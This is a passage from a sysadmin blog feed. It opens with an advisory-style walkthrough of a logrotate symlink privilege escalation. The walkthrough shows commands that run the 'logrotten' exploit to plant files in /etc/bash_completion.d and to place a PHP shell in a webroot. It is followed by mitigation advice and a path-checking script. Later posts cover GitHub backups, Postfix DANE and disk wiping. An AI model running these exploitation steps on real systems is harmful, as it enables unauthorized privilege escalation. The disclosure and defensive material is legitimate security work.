As long as one directory of the complete path can be modified by a user, logrotate can be exploited.</p> <p>Root owns /var/www/project/html:</p> <pre><code>drwxr-xr-x 3 root root 4096 Apr 30 17:26 /var/www/project/html/</code></pre> <p>Root owns /var/www/project/html/logdir/:</p> <pre><code>drwxr-xr-x 2 root root 4096 Apr 30 17:28 /var/www/project/html/logdir/</code></pre> <p>Only root can write the logfile:</p> <pre><code>-rw-r--r-- 1 root root 0 Apr 30 17:28 /var/www/project/html/logdir/file.log</code></pre> <p>But user www-data owns a directory higher up the path and can therefore manipulate everything below it:</p> <pre><code>drwxr-xr-x 3 www-data root 4096 Apr 30 17:26 /var/www/project</code></pre> <p>Logrotate configuration having the “create” directive without an explicit owner and mode:</p> <pre><code>/var/www/project/html/logdir/file.log {
    daily
    rotate 12
    missingok
    notifempty
    size 1k
    create
}</code></pre> <p>www-data is allowed to rename the directory /var/www/project/html:</p> <pre><code>www-data@localhost$ mv /var/www/project/html/ /var/www/project/html2</code></pre> <p>www-data can create a new logdir, which will be writable by www-data:</p> <pre><code>www-data@localhost$ mkdir -p /var/www/project/html/logdir</code></pre> <p>www-data can write into the new logfile:</p> <pre><code>www-data@localhost$ echo "hello world" &gt; /var/www/project/html/logdir/file.log</code></pre> <p>Permissions of /var/www/project/html/logdir/file.log:</p> <pre><code>-rw-r--r-- 1 www-data www-data 0 Apr 30 17:31 /var/www/project/html/logdir/file.log</code></pre> <p>User www-data executes the exploit and waits until logrotate is started by cron:</p> <pre><code>www-data@localhost$ ./logrotten /var/www/project/html/logdir/file.log
Waiting for rotating /var/www/project/html/logdir/file.log...
Renamed /var/www/project/html/logdir with /var/www/project/html/logdir2 and created symlink to /etc/bash_completion.d
Done!</code></pre> <p>The new file was created in /etc/bash_completion.d with owner www-data: "create" without explicit owner and mode takes them from the rotated file, which www-data owns:</p> <pre><code>-rw-r--r-- 1 www-data www-data 0 Apr 30 17:35 /etc/bash_completion.d/file.log</code></pre> <h3>4) Logrotate runs as a low-privileged user because the “su” directive is set. The path to the log directory is controlled by the members of a group.</h3> <p>Using the “su” directive is not safe per se. 
It prevents attackers from getting root privileges, but it is still possible to gain the privileges of another user.</p> <p>The directories below /var/www are owned by www-data. Only logdirs is writable by members of the group “loggrp”:</p> <pre><code>drwxr-xr-x 2 www-data www-data 4096 May  1 05:21 /var/www/html
drwxrwxr-x 3 www-data loggrp   4096 May  1 05:24 /var/www/logdirs</code></pre> <p>The users www-data and myserv are members of the group loggrp:</p> <pre><code>loggrp:x:1001:www-data,myserv</code></pre> <p>Logrotate is configured with the “su” directive. It will rotate logs with the privileges of www-data instead of root. The target /var/www/logdirs/example.com/* makes sure that all files inside the log directory will be rotated:</p> <pre><code>/var/www/logdirs/example.com/* {
    daily
    rotate 12
    missingok
    notifempty
    size 1k
    create www-data loggrp
    su www-data loggrp
}</code></pre> <p>User “myserv” executes the exploit with the target directory “/var/www/html”:</p> <pre><code>myserv@localhost$ ./logrotten -t /var/www/html /var/www/logdirs/example.com/shell.php
Waiting for rotating /var/www/logdirs/example.com/shell.php...
Renamed /var/www/logdirs/example.com with /var/www/logdirs/example.com2 and created symlink to /var/www/html
Done!</code></pre> <p>The newly created file is owned by www-data but group-writable by loggrp, so user “myserv” can now write any PHP shell into it and have it executed with the privileges of www-data:</p> <pre><code>-rw-rw-r-- 1 www-data loggrp 0 May  1 05:47 /var/www/html/shell.php</code></pre> <h2>Mitigation</h2> <p>This vulnerability occurs if log files are rotated in insecure directories. Even though the “su” directive of logrotate can prevent an attacker from becoming root, it still leaves the opportunity open to escalate to another system user (as shown in example 4).</p> <p>One way to mitigate the problem is to confine logrotate with AppArmor or SELinux, so that it can only create files below the directories it is meant to rotate.</p> <h2>Fix</h2> <p>Vulnerable setups can be easily fixed by making sure that the path to the log directory can only be manipulated by root or the owner of the log directory. However, a vulnerable setup is not always obvious. Therefore logrotate should check the complete path to the log directory. If one element of the path is not secure, logrotate has to abort with an error. Algorithms for checking a directory path can be found on the following pages:</p> <ul><li> <p><a href="http://research.cs.wisc.edu/mist/safefile/safeopen_ares2008.pdf">http://research.cs.wisc.edu/mist/safefile/safeopen_ares2008.pdf</a></p> </li> <li> <p><a href="https://wiki.sei.cmu.edu/confluence/display/c/FIO15-C.+Ensure+that+file+operations+are+performed+in+a+secure+directory">https://wiki.sei.cmu.edu/confluence/display/c/FIO15-C.+Ensure+that+file+operations+are+performed+in+a+secure+directory</a></p> </li> </ul><p>Deploying such a fix might have a huge impact. If it were deployed at large scale it could break existing installations, because it prevents logrotate from rotating in insecure setups.</p> <h2>Conclusion</h2> <p>Logrotate is widely used for rotating logfiles. As the examples above have shown, insecure configurations are not always obvious. 
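</p> <p>As an added example (not part of the original post and not logrotate's own code), here is the kind of path check the Fix section asks for, as a POSIX shell script: it walks every directory from the log file's parent up to / and applies the FIO15-C rule to each one, treating ACL entries the way example 2 requires. It assumes GNU stat and, where installed, getfacl. The uid 33 for www-data and the ACL text at the bottom are transcribed from the examples above as constructed input.</p>

```shell
#!/bin/sh
# logrotate-pathcheck.sh: added example, not from the original post and not
# part of logrotate. Walks every directory on the path to a log file and
# reports each one that a user other than root (or the "su" user) could
# replace with a symlink before logrotate runs.
#
# Rule per component, following SEI CERT FIO15-C: owned by root or by the
# trusted user, not group- or world-writable, and no POSIX ACL entry that
# grants write access to a named user or group.

# component_verdict OWNER_UID MODE_OCTAL ACL_TEXT TRUSTED_UID
# Pure function over already collected metadata, so it can be exercised
# offline. Prints "ok", or a short reason and returns 1.
component_verdict() {
    owner=$1 mode=$2 acl=$3 trusted=${4:-0}

    if [ "$owner" != 0 ] && [ "$owner" != "$trusted" ]; then
        echo "owner-uid-$owner"
        return 1
    fi

    if [ -n "$acl" ]; then
        # With an ACL the group bits of st_mode show the mask, not the owning
        # group's rights (example 2: drwxrwxr-x+ but group::r-x), so judge the
        # entries. A write bit in a named user/group entry, or in a default
        # entry that every file created here inherits, is a finding; root is
        # trusted anyway.
        bad=$(printf '%s\n' "$acl" \
            | grep -E '^(default:)?(user|group):[^:]+:[^:]*w' \
            | grep -Ev '^(default:)?user:root:' | head -n 1)
        if [ -n "$bad" ]; then
            echo "acl-$bad"
            return 1
        fi
        if printf '%s\n' "$acl" | grep -Eq '^other::[^:]*w'; then
            echo "world-writable"
            return 1
        fi
        if printf '%s\n' "$acl" | grep -Eq '^group::[^:]*w'; then
            echo "group-writable"
            return 1
        fi
        echo ok
        return 0
    fi

    # No ACL: the last octal digit is "other", the one before it "group";
    # the write bit has value 2. A sticky bit is deliberately not accepted
    # as an excuse, to keep the check conservative.
    other=${mode#"${mode%?}"}
    rest=${mode%?}
    group=${rest#"${rest%?}"}
    case $other in 2|3|6|7) echo "world-writable"; return 1 ;; esac
    case $group in 2|3|6|7) echo "group-writable"; return 1 ;; esac
    echo ok
}

# check_log_path /path/to/file.log [TRUSTED_USER]
# Live check with GNU stat and, where installed, getfacl. TRUSTED_USER is
# the user from logrotate's "su" directive; root if omitted.
check_log_path() {
    file=$1
    case $file in /*) ;; *) echo "need an absolute path" >&2; return 2 ;; esac
    trusted_uid=0
    if [ -n "$2" ]; then
        trusted_uid=$(id -u "$2") || return 2
    fi
    status=0
    d=$(dirname "$file")
    while :; do
        meta=$(stat -c '%u %a' "$d") || return 2
        acl=''
        if command -v getfacl >/dev/null 2>&1; then
            # -c drops the "# file:" header, -s prints nothing for
            # directories that carry only the base (mode-bit) entries.
            acl=$(getfacl -cs "$d" 2>/dev/null)
        fi
        verdict=$(component_verdict "${meta% *}" "${meta#* }" "$acl" "$trusted_uid") || {
            printf 'INSECURE %s: %s\n' "$d" "$verdict"
            status=1
        }
        [ "$d" = / ] && break
        d=$(dirname "$d")
    done
    [ "$status" -eq 0 ] && printf 'OK: every directory above %s is secure\n' "$file"
    return "$status"
}

# Constructed sample input: the getfacl output of /var/www/project from
# example 2; uid 33 stands in for www-data.
PROJECT_ACL='user::rwx
user:www-data:rwx
group::r-x
mask::rwx
other::r-x'

if [ $# -gt 0 ]; then
    check_log_path "$@"
else
    printf '%-42s %s\n' 'example 2: /var/www/project, root + ACL' \
        "$(component_verdict 0 775 "$PROJECT_ACL" 0)"
    printf '%-42s %s\n' 'example 3: /var/www/project, www-data' \
        "$(component_verdict 33 755 '' 0)"
    printf '%-42s %s\n' 'example 4: /var/www/logdirs, su www-data' \
        "$(component_verdict 33 775 '' 33)"
    printf '%-42s %s\n' 'secure: /var/log, root 755' \
        "$(component_verdict 0 755 '' 0)"
fi
```

<p>Run it as <code>sh logrotate-pathcheck.sh /var/www/project/logdir/file.log</code>, optionally with the user from the “su” directive as second argument; without arguments it prints the verdicts for the three setups above. Anything but "ok" for a component means that a user other than root or the trusted user can swap it for a symlink before the next cron run of logrotate.</p> <p>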
Even though a fix could prevent privilege escalations, it might also stop logrotate from working in insecure setups.</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 01 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> </div> </div> Wed, 01 May 2019 11:04:35 +0000 Hoti 276 at https://tech.feedyourhead.at Now is a good time to backup our github-repos https://tech.feedyourhead.at/content/now-is-a-good-time-to-backup-our-github-repos <span class="field field--name-title field--type-string field--label-hidden">Now is a good time to backup our github-repos</span> <div 
class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Many people are scared because <a href="https://news.microsoft.com/2018/06/04/microsoft-to-acquire-github-for-7-5-billion/">Microsoft bought GitHub</a>. I wonder why people are so shocked now. GitHub is just another cloud thingy, and cloud means: "it's just somebody else's computer". If that somebody shuts down or wipes their computer, we had better have backups. With this in mind I would say it's time to make (automatic) backups. I wrote this little Ruby script that clones all public repositories of a user into a directory. If a repository already exists locally, the script just does a "git pull". It pages through the GitHub API (a single answer holds only 30 repositories by default), hands repository names to git as separate arguments instead of through a shell, and aborts if the API returns an error instead of a list.</p> <pre><code>#!/usr/bin/env ruby

require 'net/http'
require 'json'
require 'fileutils'

directory = "./"

def help
  warn "usage: #{$PROGRAM_NAME} &lt;github-user&gt; [ &lt;dst-directory&gt; ]"
  exit 1
end

# got this function from stackoverflow.com:
# stackoverflow.com/questions/2108727/which-in-ruby-checking-if-program-exists-in-path-from-ruby
def which(cmd)
  exts = ENV['PATHEXT'] ? ENV['PATHEXT'].split(';') : ['']
  ENV['PATH'].split(File::PATH_SEPARATOR).each do |path|
    exts.each do |ext|
      exe = File.join(path, "#{cmd}#{ext}")
      return exe if File.executable?(exe) &amp;&amp; !File.directory?(exe)
    end
  end
  nil
end

# The API answers in pages of 30 repositories by default; walk all pages so
# that users with many repositories get a complete backup.
def public_repos(user)
  repos = []
  page = 1
  loop do
    uri = URI("https://api.github.com/users/#{user}/repos?per_page=100&amp;page=#{page}")
    parsed = JSON.parse(Net::HTTP.get(uri))
    # Errors come back as a hash ({"message" =&gt; "Not Found"}), not an array.
    abort "github-api error: #{parsed['message']}" unless parsed.is_a?(Array)
    break if parsed.empty?
    repos.concat(parsed)
    page += 1
  end
  repos
end

gitbin = which("git")

if gitbin.nil?
  warn "git-binary not found"
  exit 1
end

help if ARGV.length &lt; 1 || ARGV.length &gt; 2

gituser = ARGV[0]
directory = ARGV[1] if ARGV.length == 2

FileUtils.mkdir_p(directory) unless File.directory?(directory)

public_repos(gituser).each do |p|
  target = File.join(directory, p['name'])
  # Arguments go to git as an array, so nothing is interpreted by a shell.
  if File.directory?(target)
    system(gitbin, '-C', target, 'pull') or warn "pull failed for #{p['name']}"
  else
    system(gitbin, 'clone', "https://github.com/#{p['full_name']}", target) or
      warn "clone failed for #{p['name']}"
  end
end</code></pre> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span 
class="field field--name-created field--type-created field--label-hidden">Jun 07 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ruby" hreflang="en">Ruby</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/103" hreflang="en">Open-Source</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/backup" hreflang="en">Backup</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/shell" hreflang="en">Shell</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> </div> </div> Thu, 07 Jun 2018 10:41:24 +0000 Hoti 267 at https://tech.feedyourhead.at Postfix: verified TLS with DANE https://tech.feedyourhead.at/content/postfix-verified-tls-with-dane <span class="field field--name-title field--type-string field--label-hidden">Postfix: verified TLS with DANE</span> <div class="clearfix text-formatted field field--name-body 
field--type-text-with-summary field--label-hidden field__item"><p>TLS via SMTP is <a href="https://en.wikipedia.org/wiki/Opportunistic_TLS">opportunistic</a> which makes connections vulnerable to man-in-the-middle-attacks. In order to prevent mitm-attacks, <a href="https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities">DANE</a> could be used. The sender-server will first check the domain-records if dnssec is in use(and valid) and if a TLSA-record is published(and valid). If a TLSA-record is valid and matches with the certificate of the recipient-server the connection could be encrypted and the encryption is verified. Postfix was one of the first smtp-servers that implemented DANE since the <a href="https://tools.ietf.org/id/draft-dukhovni-smtp-opportunistic-tls-00.html">author of the DANE protocol is a postfix-developer</a>. This article describes how to enable DANE in postfix.</p> <h3>Preconditions</h3> <p>It's very easy to enable DANE in postfix. First we have to ensure that postfix can resolve DNSsec queries. I recommend to install the dns-resolver "<a href="https://unbound.net/">unbound</a>" on the postfix-server. Unbound does DNSsec pretty well. It also automatically manages the trust-anchors for DNSsec. We can check if DNSsec works, if the "ad"-flag is set. So lets use dig to test it:</p> <pre> <code>&gt; DiG 9.9.5-9+deb8u15-Debian &lt;&lt;&gt;&gt; gov. +dnssec ;; global options: +cmd ;; Got answer: ;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 35764 ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags: do; udp: 4096 ;; QUESTION SECTION: ;gov. IN A </code></pre> <p>As we can see, the "ad"-flag was set. If we use a resolver without dnssec-support it would look like that:</p> <pre> <code> % dig gov. +dnssec ; &lt;&lt;&gt;&gt; DiG 9.8.4-rpz2+rl005.12-P1 &lt;&lt;&gt;&gt; gov. 
+dnssec ;; global options: +cmd ;; Got answer: ;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: SERVFAIL, id: 25074 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags: do; udp: 4000 ;; QUESTION SECTION: ;gov. IN A </code></pre> <p>As you can see, there is no "ad"-flag in this example. That indicates that DNSsec is not supported by the resolver.</p> <h3>Postfix-config</h3> <p>As soon as we set up a resolver with dnssec-support, we can easily enable DANE in postfix:</p> <pre> <code> # DANE-Settings smtp_dns_support_level=dnssec smtp_host_lookup=dns smtp_tls_security_level = dane smtp_tls_loglevel=1 </code></pre> <p>Now postfix will always try to verify the TLS-connection using DANE. If you just want to enable DANE for specific domains, I'll recommend have a look at the <a href="http://www.postfix.org/TLS_README.html#client_tls">example in the postfix-documentation</a>.</p> <h3>Test</h3> <p>We can test DANE by sending Emails to a server that has TLSA-Records. There is a list of domains with TLSA-records at the end of <a href="https://static.ptbl.co/static/attachments/169319/1520904692.pdf?1520904692">this pdf</a>. 
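Before sending real mail, the two checks this setup relies on can be reproduced offline: that the resolver really validates (the "ad" flag from the Preconditions section) and that a TLSA record matches the receiving server's certificate, which is what turns a connection into a "Verified" one. The following Python script is an added example, not code from the original post or from Postfix; the dig excerpts, certificate bytes and TLSA records in it are constructed.

```python
"""DANE helpers: check a dig answer for the "ad" flag and match TLSA records
against a certificate the way Postfix does with smtp_tls_security_level=dane.
Added example, not code from the original post or from Postfix; sample data is constructed."""
import hashlib
import re

# Constructed excerpts of dig output: only the validating resolver sets "ad".
DIG_VALIDATED = ";; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1"
DIG_UNVALIDATED = ";; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1"

def has_ad_flag(dig_output: str) -> bool:
    """True if the resolver set the AD (authenticated data) bit on the answer.
    The bit is only evidence when the resolver itself is trusted (unbound on
    localhost); an AD bit relayed from an arbitrary upstream proves nothing."""
    m = re.search(r"^;; flags: ([a-z ]+);", dig_output, re.MULTILINE)
    return bool(m) and "ad" in m.group(1).split()

def parse_tlsa(rdata: str):
    """Parse the presentation format dig prints: 'usage selector mtype hex...'."""
    usage, selector, mtype, *data = rdata.split()
    return int(usage), int(selector), int(mtype), bytes.fromhex("".join(data))

def tlsa_matches(rdata: str, cert_der: bytes, spki_der: bytes) -> bool:
    """Match one TLSA record against the receiving server's end-entity
    certificate (RFC 6698 section 2.1): cert_der is the DER certificate,
    spki_der its SubjectPublicKeyInfo. Usages 0 and 1 (PKIX-*) are ignored
    for SMTP (RFC 7672), as Postfix does; usage 2 (DANE-TA) needs the whole
    chain and is not implemented here, so only DANE-EE (usage 3) can match."""
    usage, selector, mtype, assoc = parse_tlsa(rdata)
    if usage != 3:
        return False
    selected = {0: cert_der, 1: spki_der}.get(selector)
    if selected is None:
        return False
    digest = {0: lambda b: b, 1: lambda b: hashlib.sha256(b).digest(),
              2: lambda b: hashlib.sha512(b).digest()}
    return mtype in digest and digest[mtype](selected) == assoc

def dane_verified(records, cert_der: bytes, spki_der: bytes) -> bool:
    """Postfix logs 'Verified' if any usable TLSA record matches."""
    return any(tlsa_matches(r, cert_der, spki_der) for r in records)

# Constructed stand-ins for the receiving MX's certificate and its SPKI.
CERT_DER = b"constructed-der-certificate-of-the-receiving-mx"
SPKI_DER = b"constructed-subject-public-key-info"
TLSA_EE_SPKI = "3 1 1 " + hashlib.sha256(SPKI_DER).hexdigest()  # usual "3 1 1" record
TLSA_STALE = "3 1 1 " + hashlib.sha256(b"rotated-away-key").hexdigest()  # old key
TLSA_PKIX = "1 1 1 " + hashlib.sha256(SPKI_DER).hexdigest()  # PKIX-EE, ignored for SMTP
```

Postfix looks the TLSA records up under _25._tcp. followed by the MX hostname and only uses them when that lookup is DNSSEC-validated; otherwise the dane level falls back to unauthenticated opportunistic TLS, which is why the resolver check comes first.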
I tested DANE by sending an email to a gmx.net address:</p>
<pre><code>May 12 21:26:59 mymailserver postfix/smtp[3064]: Verified TLS connection established to mx01.emig.gmx.net[212.227.17.5]:25: TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)</code></pre>
<p>The keyword "Verified" indicates that the TLS connection was verified.</p>
</div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 14 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/crypto" hreflang="en">Crypto</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/email" hreflang="en">Email</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/mail" hreflang="en">Mail</a></div> </div> </div>
Mon, 14 May 2018 12:11:10 +0000 Hoti 265 at https://tech.feedyourhead.at statx-fun got popular https://tech.feedyourhead.at/content/statx-fun-got-popular <span class="field field--name-title field--type-string field--label-hidden">statx-fun got popular</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I am very surprised that <a href="https://tech.feedyourhead.at/content/using-the-new-statx-system-call">statx-fun</a> became one of my most popular <a href="https://github.com/whotwagner/statx-fun">git repositories</a>. Arkadiusz Miśkiewicz even created a <a href="https://git.pld-linux.org/gitweb.cgi?p=packages/statx-fun.git;a=summary">PLD-Linux package</a> for it. I didn't expect that.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 06 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> </div> </div>
Sun, 06 May 2018 11:24:36 +0000 Hoti 263 at https://tech.feedyourhead.at HackADay: Let's make a Nukestation https://tech.feedyourhead.at/content/hackaday-lets-make-a-nukestation <span class="field field--name-title field--type-string field--label-hidden">HackADay: Let&#039;s make a Nukestation</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Every time I replace an old hard disk with a newer or bigger one I tell myself that I'll wipe it later. By now I have a big pile of hard disks to wipe. Since wiping takes ages, I don't want to use my personal computer for that; I would prefer a small device with low energy consumption just for wiping. That's why I am going to build a "Nukestation". Basically it's just a Raspberry Pi with nwipe on it and a udev rule that automatically wipes attached hard disks. But some extras would be nice...</p>
<h3>Hardware</h3>
<p>My setup is quite basic: a Raspberry Pi 3B+, a USB disk docking station, and an LED signalling that the drive can safely be removed or attached. I know, it would be much better to use a red LED to signal when the Nukestation is wiping disks, but I only had green LEDs at home. That's why I'm gonna do it the other way around.</p>
<p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/nukestation.mp4" type="video/mp4" /></video> </p>
<p>This video shows my setup. As soon as I plug in the hard disk, the green LED goes dark to signal that it is not safe to remove the disk now, and on the screen we can see that nwipe starts its job.</p>
<h3>Little Extras</h3>
<p>I wrote a bash script called "nukestation.sh". This script is a wrapper for nwipe and allows us to:</p>
<ul> <li>Create pre-run hooks (like turning off the LED)</li> <li>Run nwipe with configurable settings</li> <li>Create post-run hooks (like turning on the LED)</li> <li>Send a notification including the nwipe log via email</li> </ul>
<h3>Installation</h3>
<p>I won't use this Raspberry Pi only for wiping disks, so I need a very easy installation routine for the Nukestation. I used the configuration management system <a href="https://www.ansible.com/">ansible</a> for that. The sources of my Nukestation ansible role can be downloaded from <a href="https://github.com/whotwagner/ansible-role-nukestation">Github</a>, and the role is available on ansible-galaxy too. On a freshly installed <a href="https://www.raspberrypi.org/downloads/raspbian/">Raspbian</a> the Nukestation can be installed with the following commands:</p>
<pre><code>$ sudo apt-get install ansible
$ sudo ansible-galaxy install whotwagner.nukestation
$ cat &gt; playbook.yml &lt;&lt; EOF
---
- hosts: localhost
  roles:
    - whotwagner.nukestation
EOF
$ sudo ansible-playbook playbook.yml
</code></pre>
<p>The playbook above installs the Nukestation without mail support. If we want to install a mail system with an authenticated smarthost, so that notifications are sent automatically, we can use another playbook:</p>
<pre><code>$ sudo apt-get install ansible
$ sudo ansible-galaxy install whotwagner.nukestation
$ cat &gt; playbook.yml &lt;&lt; EOF
- hosts: localhost
  roles:
    - whotwagner.nukestation
  vars:
    nukestation_mailconf:
      server: mail.example.conf:587
      user: username@example.conf
      pass: super-secret-password
      from: from@example.com
      to: to@example.com
EOF
$ sudo ansible-playbook playbook.yml
</code></pre>
<p>Detailed documentation of the playbook and the nukestation.sh script can be found on <a href="https://github.com/whotwagner/ansible-role-nukestation">Github</a>.</p>
<h3>Conclusion</h3>
<p>The Nukestation allows me to wipe disks easily, and I receive a notification as soon as the wipe job is finished. <em>"I love it when a plan comes together"</em></p>
</div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Apr 15 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/hackaday" hreflang="en">HackADay</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/hardware" hreflang="en">Hardware</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/raspberry" hreflang="en">Raspberry</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ansible" hreflang="en">Ansible</a></div> </div>
</div> Sun, 15 Apr 2018 16:45:24 +0000 Hoti 262 at https://tech.feedyourhead.at